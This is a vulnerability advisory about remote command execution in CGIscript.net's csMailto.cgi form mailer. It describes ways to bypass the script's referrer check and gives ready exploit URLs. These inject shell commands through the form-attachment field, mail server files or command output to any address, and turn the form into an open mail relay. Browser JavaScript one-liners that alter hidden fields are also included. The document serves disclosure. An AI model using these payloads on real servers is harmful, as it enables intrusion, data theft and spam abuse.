COMMAND

	CGIscript.net\'s csMailto.cgi remote command execution

SYSTEMS AFFECTED

	??

PROBLEM

	In Steve Gustin [stegus1@yahoo.com] advisory :
	

	Because the script stored all the  form  configuration  data  in  hidden
	fields in the actual form, once a user can  bypass  the  referrer  check
	they can essentially do anything an administrator of the  program  could
	do, plus some additional things that probably weren\'t intended.
	

	The script doesn\'t even check for the full  referrer,  it  only  checks
	for the presence of the server hostname in the referral your  send.  For
	example,            if             the             script             is
	http://host.com/cgi-script/CSMailto/CSMailto.cgi then it will  look  for
	\"host.com\" in the referer.
	

	This method is inherently insecure and can be bypassed by:
	

	- Creating a perl LWP script which could specify an arbitrary referrer.
	

	- Using javascript or other means to  modify  the  form  values  on  the
	generated CSMailto form and allowing the browser to  send  the  original
	(and valid) URL as a referrer.
	

	- Creating a local form page with the target hostname in  the  path  and
	thus the referrer that is sent  when  in  the  form  is  submitted  (eg:
	C:\\html\\host.com\\form.html)
	

	- Creating a local html page with a simple  link  (see  below)  and  the
	target hostname in the path and thus in the referrer that is  sent  when
	the link is clicked (eg: C:\\html\\host.com.html)
	

	Some example exploits are as follows. Note, these all  assume  that  the
	referrer check was bypassed with one of the above methods.
	

	- execute commands on server
	

	CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

	

	- execute command on server and mail output to anyone
	

	CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

	

	- email server file to anyone
	

	CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform

	

	- download/access form input (no referer check)
	

	CSMailto has the option to \"have the feedback exported to  an  external
	file\". These files are stored in  CSV  format  and  can  be  downloaded
	from:
	

	CSMailto/export/FORM_NAME.csv

	

	Form HTML  files  are  often  named  after  their  form  names  and  the
	information is also stored in hidden fields in the actual form  like  so
	\"...formname=FORM_NAME...\". Also, it\'s worth noting that  the  script
	doesn\'t properly escape \'\"\', \',\', or nextline (\"\\n\") chars,  so
	any CSV data with those characters may get corrupted.
	

	- use form to send email to anyone
	

	CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform

	

	Another example of the seriousness of this problem, as mentioned  above,
	you can simply load an existing CSMailto form and have your browser  (IE
	in this example) change some of the preset hidden form values  and  then
	click submit. Example:
	

	- email server file to anyone
	

	javascript:alert(document.forms[0][\"form-attachment\"].value=\"FILEPATH\");

	 

	javascript:alert(document.forms[0][\"form-autoresponse\"].value=\"YES\");

	 

	javascript:alert(document.forms[0][\"Email\"].value=\"user@host.com\");

	

SOLUTION

	None yet.